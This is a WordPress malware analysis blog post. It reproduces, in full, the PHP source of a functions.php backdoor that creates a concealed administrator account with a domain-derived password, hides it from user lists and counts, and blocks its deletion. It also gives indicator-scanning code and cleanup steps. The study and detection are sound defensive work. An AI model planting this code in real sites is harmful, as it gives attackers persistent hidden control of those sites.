Hidden WordPress Admin Backdoor Malware – In-Depth Technical Review

MD Pabel July 30, 2025
Issue Reported

Malicious PHP code was discovered in a WordPress theme’s functions.php file. It contains a backdoor that creates a hidden administrator account and includes several mechanisms to keep that account concealed and protected from removal.

Malware Analysis

Hidden Administrative Backdoor – A persistent access mechanism that automatically creates and protects a concealed administrator account, classified as WordPress backdoor admin-creation malware.

Technical Breakdown

Code Breakdown and Decoding

Primary Malware Functions

The malware consists of five interconnected PHP functions designed to create and maintain unauthorized administrative access:

1. auto_create_fallback_admin() – Core Backdoor Function

function auto_create_fallback_admin() {
    $user = get_user_by('login', 'adm1nlxg1n');

    if (!$user) {
        $site_url = site_url();
        $parsed_url = parse_url($site_url);
        $domain = str_replace('.', '', $parsed_url['host']);
        $template = array(2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5);
        $result = '';
        foreach ($template as $item) {
            $result .= is_int($item) ? ($domain[$item] ?? '') : $item;
        }

        $args = array(
            'user_login' => 'adm1nlxg1n',
            'user_pass' => $result,
            'role' => 'administrator',
            'user_email' => 'wordpresupportadm11@gmail.com'
        );

        $id = wp_insert_user($args);
        update_option('_pre_user_id', $id);
    }
}

Password Generation Algorithm Analysis:
The malware derives the password from the site’s own domain rather than hard-coding it. It takes the host part of site_url(), removes the dots, and walks a fixed template to build a password that is unique to each infected site:

  • Template: [2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5]
  • Process: Integers select characters from the dot-stripped domain by position (missing positions contribute nothing because of the ?? '' fallback); strings are appended literally
  • Example: For example.com → examplecom → Password: aXm3eYx1qPpexKl

2. wc_tool_query_fallback() – User List Concealment

function wc_tool_query_fallback($user_search) {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (is_wp_error($id) || $user_id == $id) return;
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
        $user_search->query_where);
}

This function rewrites the WHERE clause of WordPress user queries (via the pre_user_query hook) so that the backdoor account’s ID is excluded from user listings in the dashboard. The exclusion is skipped when the currently logged-in user is the backdoor account itself.

3. protect_user_count_fallback() – Count Manipulation

function protect_user_count_fallback($views) {
    // Reduces admin count display by 1 to hide the extra admin
    $html = explode('(', $views['all']);
    $count = explode(')', $html[1]);
    $count[0]--;
    $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
    // Similar manipulation for administrator count
    return $views;
}

4. wc_tool_profiles_fallback() – Profile Access Prevention

function wc_tool_profiles_fallback() {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) {
        wp_die(__('Invalid user ID.'));
    }
}

5. protect_user_from_deleting_fallback() – Deletion Prevention

function protect_user_from_deleting_fallback() {
    $id = get_option('_pre_user_id');
    if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action'])
        && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) {
        wp_die(__('Invalid user ID.'));
    }
}

Stealth and Evasion Techniques

  • Disguised Username: Uses adm1nlxg1n instead of obvious terms like “admin”
  • Legitimate-Looking Email: wordpresupportadm11@gmail.com mimics WordPress support
  • Database Hiding: Modifies WordPress user queries to exclude the account from admin interfaces
  • Count Manipulation: Reduces the displayed user counts to mask the extra administrator
  • Access Protection: Blocks the user-edit screen for the account and aborts delete actions against it
  • Domain-Specific Passwords: Generates a different password per website, so no single static password can serve as an indicator

WordPress Hook Integration

The malware registers its functions with WordPress hooks to execute automatically:

  • add_action('init', 'auto_create_fallback_admin') – Runs on every request and recreates the user whenever it is missing
  • add_action('pre_user_query', 'wc_tool_query_fallback') – Hides the account from user queries
  • add_filter('views_users', 'protect_user_count_fallback') – Manipulates the user counts shown above the user list
  • add_action('load-user-edit.php', 'wc_tool_profiles_fallback') – Blocks access to the account’s profile screen
  • add_action('admin_menu', 'protect_user_from_deleting_fallback') – Aborts delete requests for the account
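The function names, the _pre_user_id option key and the hooks listed above are stable indicators of this sample. The following scanner is an added example, not part of the original post or the author’s tooling: it flags those indicators line by line in a theme file, and separately compares a raw-database administrator list against what the dashboard shows, which is the gap the pre_user_query hook creates. The functions.php excerpt and user lists are constructed sample data.

```python
import re

# Indicators taken from the analysed sample: the five function names, the
# wp_options key holding the hidden user's ID, the query tampering and the hooks.
INDICATORS = {
    "backdoor function": re.compile(
        r"function\s+(auto_create_fallback_admin|wc_tool_query_fallback|"
        r"protect_user_count_fallback|wc_tool_profiles_fallback|"
        r"protect_user_from_deleting_fallback)\s*\("),
    "hidden-admin option key": re.compile(r"['\"]_pre_user_id['\"]"),
    "user-query tampering": re.compile(r"str_replace\(\s*['\"]WHERE 1=1['\"]"),
    "user-listing hook": re.compile(
        r"add_(?:action|filter)\(\s*['\"](pre_user_query|views_users|"
        r"load-user-edit\.php)['\"]"),
}

def scan_php(source):
    """Return (indicator, line_number, line) for every matching line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((label, lineno, line.strip()))
    return hits

def hidden_admins(db_admins, dashboard_admins):
    """Administrators present in wp_users/wp_usermeta (read with direct SQL,
    which no WordPress hook can filter) but absent from the dashboard list."""
    return sorted(set(db_admins) - set(dashboard_admins))

# Constructed functions.php excerpt (not from a real site) for a self-test.
SAMPLE = """<?php
function my_theme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'my_theme_setup');
function wc_tool_query_fallback($user_search) {
    $id = get_option('_pre_user_id');
    $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id}", $user_search->query_where);
}
add_action('pre_user_query', 'wc_tool_query_fallback');
"""

if __name__ == "__main__":
    for label, lineno, line in scan_php(SAMPLE):
        print(f"line {lineno}: {label}: {line}")
    # Constructed lists: what a raw SQL query returned vs. what wp-admin showed.
    print(hidden_admins(["admin", "adm1nlxg1n"], ["admin"]))
```

Because WP-CLI’s user listing also runs through WP_User_Query, the same hook can hide the account from the CLI while the theme is loaded; read wp_users directly when in doubt.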

Security Impact and Persistence

This malware demonstrates advanced persistence mechanisms commonly found in WordPress backdoor attacks:

  • Automatic Execution: Runs on every WordPress initialization via the init hook
  • Self-Protection: Multiple layers hide the account and block attempts to view or delete it
  • Administrative Access: Full WordPress privileges, which allow arbitrary code execution through the dashboard
  • Reinfection Capability: Recreates the account on the next request as long as auto_create_fallback_admin remains in functions.php

The malware belongs to a broader category of WordPress backdoor malware that has become increasingly sophisticated; security researchers note that such attacks often evade detection by multiple security scanners.

Final Result

  • Remove Malicious Code: Delete all five functions and their add_action/add_filter registrations from the functions.php file

  • Delete Malicious User: Remove the adm1nlxg1n user account from WordPress admin

  • Clean Database: Remove the _pre_user_id option from the wp_options table

  • Security Scan: Perform a comprehensive malware scan for additional backdoors

  • Password Reset: Change all administrator passwords

  • File Integrity Check: Verify that no WordPress core files have been modified

Evidence & Screenshots

Figure 1 (screenshot)

About the Author

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, an agency specializing in custom web development, WordPress security, and malware removal. With 8+ years of experience, he has completed 3200+ projects, served 2300+ clients, and resolved 4500+ cases of malware and hacked websites.